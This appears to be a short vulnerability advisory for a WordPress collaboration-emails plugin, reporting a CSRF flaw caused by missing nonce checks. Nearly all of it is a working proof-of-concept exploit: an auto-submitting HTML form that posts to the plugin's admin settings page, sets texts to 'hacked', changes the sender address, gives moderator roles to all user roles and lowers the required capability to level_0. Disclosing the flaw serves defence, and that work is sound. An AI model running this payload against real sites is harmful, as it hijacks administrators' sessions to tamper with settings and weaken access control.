The plugin is vulnerable to CSRF due to missing nonce checks. This allows the change of its settings, which can be used to lower the required user level, change texts, the used email address and more.
<form id="test" action="https://example.com/wp-admin/options-general.php?page=peters_collaboration_emails.php" method="POST">
<input type="text" name="pce_blogname" value="hacked">
<input type="text" name="pce_fromaddress" value="[email protected]">
<input type="text" name="pce_fromname" value="hacked">
<input type="text" name="pce_whoapproved" value="1">
<input type="text" name="pce_contributor_roles[]" value="contributor">
<input type="text" name="pce_moderator_roles[]" value="administrator">
<input type="text" name="pce_moderator_roles[]" value="author">
<input type="text" name="pce_moderator_roles[]" value="contributor">
<input type="text" name="pce_moderator_roles[]" value="editor">
<input type="text" name="pce_moderator_roles[]" value="subscriber">
<input type="text" name="pce_emails_to_send[]" value="pending">
<input type="text" name="pce_emails_to_send[]" value="approved">
<input type="text" name="pce_emails_to_send[]" value="future">
<input type="text" name="pce_emails_to_send[]" value="backtodraft">
<input type="text" name="pce_emails_to_send[]" value="wentlive">
<input type="text" name="pce_emails_to_send[]" value="private_to_published">
<input type="text" name="pce_emails_to_send[]" value="edited">
<input type="text" name="pce_required_capability" value="level_0">
<input type="text" name="pce_settingssubmit" value="Aktualisieren">
</form>
<script>
document.getElementById("test").submit();
</script>